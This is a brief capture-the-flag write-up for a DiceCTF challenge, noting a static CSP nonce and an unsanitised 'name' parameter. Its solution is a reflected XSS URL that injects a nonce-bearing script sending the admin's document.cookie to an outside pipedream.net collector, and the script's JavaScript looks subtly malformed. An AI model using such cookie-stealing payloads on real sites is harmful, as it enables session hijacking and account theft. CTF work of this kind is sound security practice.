Difficulty:
Notes:
NONCEis static per deployment- queryParam
nameis not sanitized before
Rabbit Holes:
Solution:
Simple XSS Payload extracting the Cookie from the Admin. Nonce is static and can be hardcoded.
https://babier-csp.dicec.tf/?name=lemon <script nonce=LRGWAXOY98Es0zz0QOVmag==> location.window="http://enk6w2e573qoxoa.m.pipedream.net/%22+document.cookie+%22speckij";